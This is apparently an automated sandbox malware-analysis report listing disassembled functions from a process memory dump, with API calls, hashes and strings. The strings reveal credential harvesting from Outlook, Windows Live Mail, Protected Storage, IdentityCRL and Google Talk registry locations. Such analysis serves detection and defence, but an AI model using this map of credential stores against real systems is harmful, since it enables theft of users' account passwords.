                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                              • API String ID: 745651260-375988210
                                                                                              • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                              • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                              • _mbscpy.MSVCRT ref: 00403E54
                                                                                              Strings
                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                              • API String ID: 1197458902-317895162
                                                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT ref: 0040FBE4
                                                                                              • memcpy.MSVCRT ref: 0040FBF9
                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                              • API String ID: 2768085393-2409096184
                                                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 256 444c80-444c85 254->256 257 444c9f-444ca3 254->257 264 444d02-444d0d __setusermatherr 255->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->265 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->255 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 272 444d81-444d85 268->272 273 444da9-444dad 268->273 270 444d74-444d76 269->270 271 444d78-444d7b 269->271 270->269 270->271 271->272 274 444d7d-444d7e 271->274 275 444d87-444d89 272->275 276 444d8b-444d9c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 3662548030-0
                                                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                              • memset.MSVCRT ref: 00444379
                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                              Strings
                                                                                              • Store Root, xrefs: 004443A5
                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                              • API String ID: 832325562-2578778931
                                                                                              • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                              • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT ref: 0040F652
                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2012582556-3916222277
                                                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                              • _mbscpy.MSVCRT ref: 0040388B
                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                              • _mbscpy.MSVCRT ref: 004038CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                              • String ID: %s@yahoo.com
                                                                                              • API String ID: 317221925-3288273942
                                                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403504
                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • _mbscpy.MSVCRT ref: 00403555
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                              • API String ID: 3071782539-966475738
                                                                                              • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                              • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 2054149589-0
                                                                                              • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                              • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                              • memset.MSVCRT ref: 00408671
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                              Strings
                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                              • API String ID: 1366857005-1079885057
                                                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 882979914-1578091866
                                                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
